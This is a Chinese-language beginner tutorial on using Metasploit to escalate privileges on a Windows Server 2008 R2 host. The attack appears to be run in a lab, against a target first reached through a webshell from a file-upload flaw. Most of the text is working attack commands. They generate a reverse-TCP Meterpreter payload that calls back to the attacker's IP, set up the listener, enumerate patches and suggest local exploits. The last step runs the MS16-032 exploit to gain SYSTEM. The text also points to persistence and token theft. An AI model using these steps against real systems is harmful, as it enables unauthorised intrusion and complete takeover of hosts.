小白教程初学,怎么用msf,怎么提权
字数 1230 2025-08-19 12:41:11
Metasploit Framework (MSF) 提权实战教程
环境准备
攻击机配置
- 操作系统:Kali Linux
- IP地址:192.168.8.139
目标机配置
- 操作系统:Windows Server 2008 R2 (英文版)
- IP地址:192.168.8.84
- 当前用户:普通用户abc
前期准备
已通过文件上传漏洞获取Webshell,并使用蚁剑连接,需要从普通用户提权至SYSTEM权限。
详细提权步骤
1. 生成反弹Shell可执行文件
在Kali终端执行以下命令生成反弹Shell:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.139 LPORT=8087 -f exe > /home/kali/Desktop/abc5.exe
参数说明:
-p windows/meterpreter/reverse_tcp:指定payload类型为Windows反弹TCP连接LHOST:指定监听主机的IP地址(Kali的IP)LPORT:指定监听端口-f exe:输出格式为可执行文件
2. 上传并执行payload
将生成的abc5.exe通过蚁剑上传至目标服务器,并执行该文件。
3. 设置监听器
在Kali中启动MSF控制台:
msfconsole
配置并启动监听模块:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.8.139
set LPORT 8087
exploit
4. 获取初始Meterpreter会话
当目标执行payload后,Kali将获得Meterpreter会话。验证当前用户权限:
getuid
5. 后台运行会话
将当前会话放入后台:
background
查看活动会话:
sessions
6. 枚举系统补丁
使用补丁枚举模块识别已安装的补丁:
use post/windows/gather/enum_patches
show options
set SESSION 1 # 设置当前会话ID
run
7. 漏洞利用建议
使用本地漏洞建议模块识别可能的提权漏洞:
use post/multi/recon/local_exploit_suggester
show options
set SESSION 1
run
结果分析:
- 绿色标记的漏洞可能有用(描述为"The target appears to be vulnerable")
- 红色标记的漏洞通常无效
- 重点关注描述为"The service is running, but could not be validated"的漏洞
8. 执行提权漏洞利用
选择建议的漏洞进行利用(以MS16-032为例):
use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
show options
set SESSION 1
run
验证提权结果:
getuid
成功提权后应显示"NT AUTHORITY\SYSTEM"。
关键点总结
- Payload生成:必须正确设置LHOST和LPORT参数
- 监听配置:监听器的payload类型必须与生成的payload一致
- 会话管理:使用background命令保持会话,sessions命令查看活动会话
- 补丁枚举:了解目标系统补丁状态有助于选择合适的提权漏洞
- 漏洞选择:优先尝试服务正在运行的漏洞利用模块
- 权限验证:每次操作后使用getuid验证当前权限级别
常见问题解决
-
监听无响应:
- 检查防火墙设置
- 确认payload已正确上传并执行
- 验证LHOST和LPORT设置一致
-
提权失败:
- 尝试其他建议的漏洞利用模块
- 检查目标系统是否已安装相关补丁
- 考虑使用其他提权技术(如令牌窃取、服务权限滥用等)
-
会话丢失:
- 确保网络连接稳定
- 考虑使用持久化技术维持访问
通过以上步骤,可以系统性地从普通用户权限提升至SYSTEM权限,为后续渗透测试活动奠定基础。